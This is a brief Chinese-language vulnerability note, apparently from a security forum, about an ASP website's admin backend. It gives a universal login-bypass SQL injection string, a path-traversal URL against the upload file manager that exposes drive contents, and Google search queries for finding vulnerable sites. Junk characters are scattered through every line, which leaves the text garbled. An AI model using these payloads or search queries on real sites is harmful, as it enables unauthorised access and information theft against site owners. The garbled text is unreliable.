后台万能密码 'or'='or': F4 p I9 k$ W* h$ c
, B. @+ I3 \, L: \7 b- e2 j
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!* \4 \3 |6 z, D( I5 x/ p1 Z- j
admin/uploadfile.asp?currentFolder=/upfiles/../, C5 V. U8 v0 e4 [+ F5 m" l- e
9 R+ j# u6 o$ u2 L7 C! S
漏洞证明: i* F) _0 k) s
; Z4 o: H8 O4 R
谷歌:inurl:type.asp?id=1 新闻中心
* q( X9 r% H, q' Q或者 :inurl:download_ok.asp?+ K+ n3 ?+ O: ?: H7 W
' K# C& B; V& [ |